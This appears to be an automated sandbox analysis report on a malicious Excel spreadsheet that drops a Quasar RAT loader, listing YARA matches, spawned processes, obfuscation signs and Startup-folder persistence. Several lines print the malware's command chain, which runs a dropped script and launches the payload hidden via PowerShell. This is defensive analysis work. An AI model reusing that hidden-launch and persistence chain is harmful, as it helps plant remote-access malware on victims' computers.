Source: 11.2.a.exe.3b7c240.3.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.a.exe.3969990.2.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.a.exe.39bc1e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.a.exe.3c9c240.3.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.a.exe.3a9c240.3.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.a.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: 13.2.a.exe.400000.0.unpack, oXs/KX8.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 13.2.a.exe.400000.0.unpack, oXs/KX8.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.adwa.spyw.expl.evad.winXLS@21/14@13/5

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6616:120:WilError_01
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Mutant created: \Sessions\1\BaseNamedObjects\Kdjaq

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\{1430B6D9-1049-4B57-9D78-04A0226B6D97} - OProcSessId.dat

Jump to behavior

Source: LIQUIDACION INTERBANCARIA 02_22_2021.xls

OLE indicator, Workbook stream: true

Source: C:\ProgramData\a.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM WIN32_PROCESSOR

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\ProgramData\a.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\ProgramData\a.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\ProgramData\a.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\ProgramData\a.exe C:\PROGRAMDATA\a.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c timeout 4 & 'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js' && powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\timeout.exe timeout 4
Source: unknown	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js'
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\ProgramData\a.exe C:\PROGRAMDATA\a.exe
Source: C:\ProgramData\a.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c timeout 4 & 'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js' && powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 4
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe

Source: C:\ProgramData\a.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\ProgramData\a.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256f source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Administrator\Desktop\CalcFis\obj\Debug\CalcFis.pdb source: a.exe, mensajeria_system[1].exe.0.dr
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp

Data Obfuscation:

.NET source code contains method to dynamically call methods (often used by packers)

Show sources

Source: 13.2.a.exe.400000.0.unpack, oXs/KX8.cs

.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)

.NET source code contains potential unpacker

Show sources

Source: 1.2.a.exe.410000.0.unpack, Form2.cs	.Net Code: akldwjhaf System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.0.a.exe.410000.0.unpack, Form2.cs	.Net Code: akldwjhaf System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 11.0.a.exe.540000.0.unpack, Form2.cs	.Net Code: akldwjhaf System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 11.2.a.exe.540000.0.unpack, Form2.cs	.Net Code: akldwjhaf System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 12.0.a.exe.270000.0.unpack, Form2.cs	.Net Code: akldwjhaf System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 12.2.a.exe.270000.0.unpack, Form2.cs	.Net Code: akldwjhaf System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.2.a.exe.a90000.1.unpack, Form2.cs	.Net Code: akldwjhaf System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.0.a.exe.a90000.0.unpack, Form2.cs	.Net Code: akldwjhaf System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 17.2.a.exe.5b0000.0.unpack, Form2.cs	.Net Code: akldwjhaf System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Suspicious powershell command line found

Show sources

Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'

Yara detected Beds Obfuscator

Show sources

Source: Yara match	File source: 00000011.00000002.876240165.0000000007590000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.715456049.0000000006E20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.789219576.0000000007530000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: a.exe PID: 6200, type: MEMORY
Source: Yara match	File source: Process Memory Space: a.exe PID: 6772, type: MEMORY
Source: Yara match	File source: Process Memory Space: a.exe PID: 740, type: MEMORY
Source: Yara match	File source: 1.2.a.exe.6e20000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.a.exe.7530000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.a.exe.3a89990.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.a.exe.3889990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.a.exe.3969990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.a.exe.3a89990.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.a.exe.7590000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.a.exe.3969990.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.a.exe.7590000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.a.exe.6e20000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.a.exe.3889990.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.a.exe.7530000.5.raw.unpack, type: UNPACKEDPE

Yara detected Costura Assembly Loader

Show sources

Source: Yara match	File source: 0000000B.00000002.777758927.0000000003B6D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.947711194.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.710965832.0000000003A90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.853281517.00000000039A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.858549049.0000000003C8C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.775433502.0000000003881000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.870308701.0000000002EE1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.952842213.0000000002DF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.866618994.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: a.exe PID: 5036, type: MEMORY
Source: Yara match	File source: Process Memory Space: a.exe PID: 6200, type: MEMORY
Source: Yara match	File source: Process Memory Space: a.exe PID: 5508, type: MEMORY
Source: Yara match	File source: Process Memory Space: a.exe PID: 6772, type: MEMORY
Source: Yara match	File source: Process Memory Space: a.exe PID: 740, type: MEMORY
Source: Yara match	File source: 1.2.a.exe.39bc1e0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.a.exe.3a9c1e0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.a.exe.3a9c240.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.a.exe.3bbc1e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.a.exe.3a89990.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.a.exe.3a9c1e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.a.exe.3889990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.a.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.a.exe.3b7c240.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.a.exe.3969990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.a.exe.3b7c240.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.a.exe.39bc1e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.a.exe.3c9c240.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.a.exe.3c9c240.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.a.exe.3a9c240.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.a.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.a.exe.3bbc1e0.2.unpack, type: UNPACKEDPE

Source: C:\ProgramData\a.exe	Code function: 1_2_00E640C1 push eax; retn 0004h
Source: C:\ProgramData\a.exe	Code function: 1_2_00E642DB pushad ; ret
Source: C:\ProgramData\a.exe	Code function: 1_2_00E64450 push 6C04C257h; ret
Source: C:\ProgramData\a.exe	Code function: 1_2_00E6450F push edi; retn 0004h
Source: C:\ProgramData\a.exe	Code function: 1_2_00E66940 push 9E4C04C2h; ret
Source: C:\ProgramData\a.exe	Code function: 1_2_00E66910 push 9C8C04C2h; ret
Source: C:\ProgramData\a.exe	Code function: 1_2_00E6B168 pushfd ; retn 0004h
Source: C:\ProgramData\a.exe	Code function: 1_2_00E69C98 pushfd ; ret
Source: C:\ProgramData\a.exe	Code function: 1_2_00E6FF29 push esp; ret
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_0541EA3B push 8B0541EBh; retf
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_06900998 pushad ; iretd
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_0690F6D2 push eax; iretd
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_06E07F5B push esp; retf

Persistence and Installation Behavior:

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\ProgramData\a.exe			Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\mensajeria_system[1].exe			Jump to dropped file

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\ProgramData\a.exe

Jump to dropped file

Boot Survival:

Drops PE files to the startup folder

Show sources

Source: C:\Windows\SysWOW64\wscript.exe

PE file moved: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe

Jump to behavior

Drops PE files to the user root directory

Show sources

Source: C:\Windows\SysWOW64\wscript.exe

PE file moved: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
